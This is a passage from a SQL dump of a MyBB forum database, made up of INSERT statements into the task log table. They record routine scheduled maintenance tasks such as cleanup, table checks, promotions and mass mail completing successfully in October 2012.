'3', '1350702117', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11508', '1', '1350702452', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11509', '7', '1350702457', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11510', '5', '1350702495', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11511', '9', '1350702633', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11512', '5', '1350703538', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11513', '9', '1350703560', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11514', '3', '1350703816', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11515', '9', '1350704530', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11516', '5', '1350704733', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11517', '9', '1350705320', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11518', '3', '1350705542', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11519', '1', '1350705602', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11520', '7', '1350705604', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11521', '5', '1350705902', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11522', '9', '1350706213', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11523', '5', '1350707103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11524', '9', '1350707131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11525', '3', '1350707415', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11526', '9', '1350708015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11527', '5', '1350708301', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11528', '9', '1350708909', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11529', '3', '1350709152', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11530', '1', '1350709219', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11531', '7', '1350709243', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11532', '5', '1350709529', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11533', '9', '1350709875', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11534', '5', '1350710744', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11535', '9', '1350710765', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11536', '3', '1350711026', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11537', '9', '1350711788', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11538', '5', '1350712018', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11539', '9', '1350712921', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11540', '3', '1350712937', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11541', '1', '1350713101', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11542', '7', '1350713335', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11543', '5', '1350713338', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11544', '9', '1350713645', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11545', '5', '1350715378', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11546', '9', '1350716660', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11547', '3', '1350717745', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11548', '5', '1350717750', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11549', '1', '1350717760', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11550', '7', '1350717763', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11551', '9', '1350718143', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11552', '5', '1350718150', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11553', '3', '1350718390', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11554', '9', '1350719580', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11555', '5', '1350722585', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11556', '9', '1350722750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11557', '3', '1350722756', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11558', '1', '1350722759', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11559', '7', '1350722817', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11560', '5', '1350722826', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11561', '9', '1350724405', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11562', '3', '1350724471', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11563', '1', '1350724528', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11564', '7', '1350724576', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11565', '5', '1350724599', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11566', '5', '1350725109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11567', '9', '1350725122', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11568', '3', '1350725548', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11569', '9', '1350726169', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11570', '5', '1350726560', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11571', '9', '1350726942', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11572', '3', '1350727879', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11573', '1', '1350727882', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11574', '7', '1350727890', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11575', '5', '1350727906', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11576', '9', '1350727945', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11577', '5', '1350728705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11578', '9', '1350728747', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11579', '3', '1350729388', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11580', '9', '1350729832', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11581', '5', '1350729900', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11582', '9', '1350730868', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11583', '3', '1350731430', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11584', '1', '1350731446', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11585', '7', '1350731813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11586', '5', '1350732011', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11587', '9', '1350732482', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11588', '5', '1350732496', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11589', '3', '1350732610', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11590', '9', '1350734504', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11591', '5', '1350734523', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11592', '3', '1350734530', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11593', '1', '1350734537', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11594', '4', '1350734554', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11595', '7', '1350735031', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11596', '5', '1350735053', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11597', '9', '1350735083', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11598', '5', '1350735918', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11599', '9', '1350736016', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11600', '3', '1350736247', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11601', '9', '1350736817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11602', '5', '1350737116', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11603', '9', '1350737764', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11604', '3', '1350737997', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11605', '1', '1350738072', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11606', '7', '1350738188', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11607', '5', '1350738492', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11608', '9', '1350738714', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11609', '5', '1350739721', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11610', '9', '1350739962', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11611', '3', '1350739990', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11612', '9', '1350741387', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11613', '5', '1350741392', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11614', '3', '1350741590', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11615', '1', '1350742511', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11616', '7', '1350742519', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11617', '5', '1350742652', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11618', '9', '1350743033', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11619', '5', '1350743184', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11620', '9', '1350743328', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11621', '3', '1350743490', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11622', '9', '1350744058', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11623', '5', '1350745569', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11624', '9', '1350745587', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11625', '3', '1350745649', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11626', '1', '1350745657', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11627', '7', '1350745661', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11628', '9', '1350745822', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11629', '5', '1350746767', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11630', '9', '1350746893', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11631', '3', '1350747071', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11632', '9', '1350747653', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11633', '5', '1350747921', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11634', '9', '1350748692', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11635', '3', '1350748747', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11636', '1', '1350748901', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11637', '7', '1350748906', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11638', '5', '1350749106', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11639', '9', '1350749491', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11640', '5', '1350750323', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11641', '9', '1350750406', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11642', '3', '1350750677', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11643', '9', '1350751655', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11644', '5', '1350751687', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11645', '9', '1350752109', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11646', '3', '1350752419', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11647', '1', '1350752424', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11648', '7', '1350752499', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11649', '5', '1350752724', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11650', '9', '1350753052', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11651', '5', '1350754073', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11652', '9', '1350754295', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11653', '3', '1350754303', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11654', '9', '1350754900', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11655', '5', '1350755149', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11656', '9', '1350755710', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11657', '3', '1350755944', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11658', '1', '1350756037', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11659', '7', '1350756093', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11660', '5', '1350756310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11661', '9', '1350756610', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11662', '5', '1350757506', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11663', '9', '1350757575', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11664', '3', '1350757803', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11665', '9', '1350758436', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11666', '5', '1350758702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11667', '9', '1350759371', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11668', '3', '1350759558', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11669', '1', '1350759610', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11670', '7', '1350759612', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11671', '5', '1350759918', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11672', '9', '1350760244', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11673', '5', '1350761123', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11674', '9', '1350761140', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11675', '3', '1350761526', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11676', '9', '1350762075', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11677', '5', '1350762440', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11678', '9', '1350762946', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11679', '3', '1350763152', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11680', '1', '1350763263', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11681', '7', '1350763273', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11682', '5', '1350763501', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11683', '9', '1350763852', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11684', '5', '1350764886', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11685', '9', '1350765142', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11686', '3', '1350765490', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11687', '9', '1350765635', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11688', '5', '1350766076', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11689', '9', '1350766697', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11690', '3', '1350766825', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11691', '1', '1350766842', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11692', '7', '1350766858', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11693', '5', '1350767111', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11694', '9', '1350767421', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11695', '5', '1350768395', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11696', '9', '1350768425', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11697', '3', '1350768641', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11698', '9', '1350769506', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11699', '5', '1350769543', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11700', '9', '1350770175', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11701', '3', '1350770346', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11702', '1', '1350770611', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11703', '7', '1350770619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11704', '5', '1350770735', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11705', '9', '1350771013', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11706', '5', '1350771929', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11707', '9', '1350772009', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11708', '3', '1350772400', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11709', '9', '1350773560', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11710', '5', '1350773586', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11711', '9', '1350773741', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11712', '3', '1350774048', 'The user cleanup task successfully ran.'); INSERT INTO 